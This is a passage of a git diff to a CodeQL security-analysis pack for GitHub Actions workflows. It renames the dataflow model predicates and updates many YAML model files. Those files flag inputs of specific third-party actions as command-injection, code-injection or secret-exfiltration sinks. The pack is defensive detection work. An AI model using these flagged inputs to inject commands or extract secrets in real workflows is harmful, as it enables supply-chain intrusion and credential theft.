+- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 +- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 +- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 +- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 2 +- .../matter-labs_zksync-era.model.yml | 2 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 +- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 +- ql/lib/ext/getsentry_action-release.model.yml | 2 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 2 +- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- .../ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 +- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 +- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- .../ext/renovatebot_github-action.model.yml | 2 +- .../ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- ...ction-detect-and-tag-new-version.model.yml | 4 +- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 2 +- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 2 +- .../tryghost_action-deploy-theme.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 2 +- .../ext/wearerequired_lint-action.model.yml | 2 +- ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 2 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +- ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +- ql/lib/qlpack.yml | 7 +- ql/lib/yaml.dbscheme | 80 ------------------- ql/lib/yaml.dbscheme.stats | 4 - ql/src/codeql-pack.lock.yml | 6 ++ ql/src/qlpack.yml | 3 +- ql/test/codeql-pack.lock.yml | 6 ++ ql/test/library-tests/test.ql | 4 +- ql/test/qlpack.yml | 6 +- 754 files changed, 808 insertions(+), 874 deletions(-) create mode 100644 .!79690!.DS_Store delete mode 100644 ql/lib/yaml.dbscheme delete mode 100644 ql/lib/yaml.dbscheme.stats diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 4b8239b7f6ca..c50889c18858 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -1,16 +1,24 @@ --- lockVersion: 1.0.0 dependencies: - codeql/controlflow: - version: 1.0.0 codeql/dataflow: version: 1.0.0 + codeql/javascript-all: + version: 1.0.0 + codeql/mad: + version: 1.0.0 + codeql/regex: + version: 1.0.0 codeql/ssa: version: 1.0.0 + codeql/tutorial: + version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 + codeql/xml: + version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c46a3ee64a1f..d0b84f918d59 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -55,8 +55,8 @@ predicate externallyTriggerableEventsDataModel(string event) { * - output arg: To node (prefixed with either `env.` or `output.`) * - provenance: verification of the model */ -predicate sourceModel(string action, string version, string output, string kind, string provenance) { - Extensions::sourceModel(action, version, output, kind, provenance) +predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) { + Extensions::actionsSourceModel(action, version, output, kind, provenance) } /** @@ -69,10 +69,10 @@ predicate sourceModel(string action, string version, string output, string kind, * - kind: Either 'Taint' or 'Value' * - provenance: verification of the model */ -predicate summaryModel( +predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ) { - Extensions::summaryModel(action, version, input, output, kind, provenance) + Extensions::actionsSummaryModel(action, version, input, output, kind, provenance) } /** @@ -84,13 +84,13 @@ predicate summaryModel( * - kind: sink kind * - provenance: verification of the model */ -predicate sinkModel(string action, string version, string input, string kind, string provenance) { - Extensions::sinkModel(action, version, input, kind, provenance) +predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) { + Extensions::actionsSinkModel(action, version, input, kind, provenance) } predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, kind, _) and + actionsSourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" @@ -113,7 +113,7 @@ predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { exists(Uses uses, string action, string version, string input, string output | - summaryModel(action, version, input, output, "taint", _) and + actionsSummaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( @@ -135,7 +135,7 @@ predicate externallyDefinedStoreStep( predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | - sinkModel(action, version, input, kind, _) and + actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 6c64b72e6b4c..05f71cfc0be6 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,21 +5,21 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel( +extensible predicate actionsSourceModel( string action, string version, string output, string kind, string provenance ); /** * Holds if a summary model exists for the given parameters. */ -extensible predicate summaryModel( +extensible predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ); /** * Holds if a sink model exists for the given parameters. */ -extensible predicate sinkModel( +extensible predicate actionsSinkModel( string action, string version, string input, string kind, string provenance ); diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index 67455900ec36..b897e8f2c5a4 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml index 0220f0d54d84..3a5b34880b95 100644 --- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml +++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 9b36680af8f0..20abd5328727 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index fe3c3e58b5f9..dcc20433483f 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 41b67c2a625d..3afd9991e073 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 4d12a2936969..3deae2a9f197 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index 7cb2e10e9267..7dd0459ab7f9 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 83f09bc6bde5..721042aafaf0 100644 --- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index bdd8a8f77c9b..ee4dbaf2b55e 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 7e5f5c9ee6a4..76ae920d2550 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 8daa9a9c2b33..46f667d75a01 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 80502e487b83..4df6fe61a43f 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git 